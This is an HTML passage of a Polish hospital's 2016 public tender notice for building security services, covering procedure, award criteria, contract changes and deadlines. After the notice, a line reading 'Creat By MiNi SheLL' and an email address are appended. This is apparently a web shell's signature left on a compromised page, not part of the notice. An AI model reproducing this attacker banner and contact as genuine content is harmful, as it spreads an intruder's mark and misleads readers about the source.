<p>Upoważnienie osób podpisujących ofertę do jej podpisania musi bezpośrednio wynikać z dokumentów dołączonych do oferty. Oznacza to, że jeżeli upoważnienie takie nie wynika wprost z dokumentu stwierdzającego status prawny wykonawcy (odpisu z właściwego rejestru) to do oferty należy dołączyć pełnomocnictwo w formie oryginału wystawione przez osoby do tego upoważnione lub potwierdzoną notarialnie kopię pełnomocnictwa.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - Doświadczenie wykonawcy w realizacji usług ochrony w budynkach użyteczności publicznej - 10</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zmiany stawek podatku VAT (w takim przypadku zmianie ulega kwota podatku VAT i cena brutto, cena netto pozostanie bez zmian).</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pirogow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wojewódzki Specjalistyczny Szpital im. M. Pirogowa w Łodzi - Dział Zamówień Publicznych (Pałacyk I piętro - ulica Wileńska 37).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 22.04.2016 godzina 10:00, miejsce: Wojewódzki Specjalistyczny Szpital im. M. Pirogowa w Łodzi - Dział Zamówień Publicznych (Pałacyk I piętro - ulica Wileńska 37).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com